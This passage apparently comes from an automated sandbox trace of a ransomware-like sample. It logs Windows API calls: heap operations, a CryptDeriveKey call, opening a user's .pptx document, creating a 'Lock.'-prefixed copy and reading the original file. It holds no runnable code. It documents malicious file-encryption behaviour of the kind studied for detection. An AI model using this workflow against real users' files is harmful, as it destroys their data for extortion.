lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0265.768] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f50, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87110) returned 1 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0265.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0265.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0265.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0265.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0265.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0265.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0265.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0265.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0265.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0265.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0265.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0265.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0265.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.774] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.775] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69c08 [0265.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69c08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0265.775] CryptDestroyHash (hHash=0xa86f50) returned 1 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0265.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0265.776] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0265.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.776] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0265.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.776] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0265.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0265.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0265.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0265.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0265.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0265.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0265.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0265.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0265.781] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lci9q.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lci9q.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0265.782] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0265.782] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0265.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0265.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0265.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0265.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0265.783] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0265.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0265.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0265.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0265.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0265.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0265.784] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.Lci9q.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.lci9q.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0265.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0265.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0265.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0265.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0265.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0265.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0265.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125d020 [0265.789] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0265.789] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xd8c0, lpOverlapped=0x0) returned 1 [0265.794] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0265.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 